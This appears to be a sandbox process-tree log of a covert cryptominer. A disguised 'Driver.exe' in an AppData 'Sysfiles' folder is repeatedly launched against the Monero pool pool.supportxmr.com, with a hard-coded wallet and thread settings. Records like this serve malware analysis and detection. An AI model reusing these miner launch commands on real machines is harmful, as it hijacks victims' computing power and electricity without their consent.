"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3736

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3284

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3188

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2376

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2504

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:760

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3884

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3636

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:684

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3780

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1876

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3008

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2480

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3716

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3632

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3824

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2512

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3016

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1852

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3996

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2152

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:264

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2384

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3132

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3584

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2180

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3632

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2928

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2772

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1584

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:588

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4824

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4980

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4380

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4552

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4464

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1408

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5460

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4552

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:6116

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5680

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4596

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4676

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:6068

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4356

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1752

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:6108

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5344

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5228

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5844

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5640

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3848

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4964

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3372

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5668

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1424

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5188

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4232

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4560

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1560

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4948

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3260

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4108

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5736

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5592

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5348

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3704

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3660

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4380

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5248

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5772

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2308

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
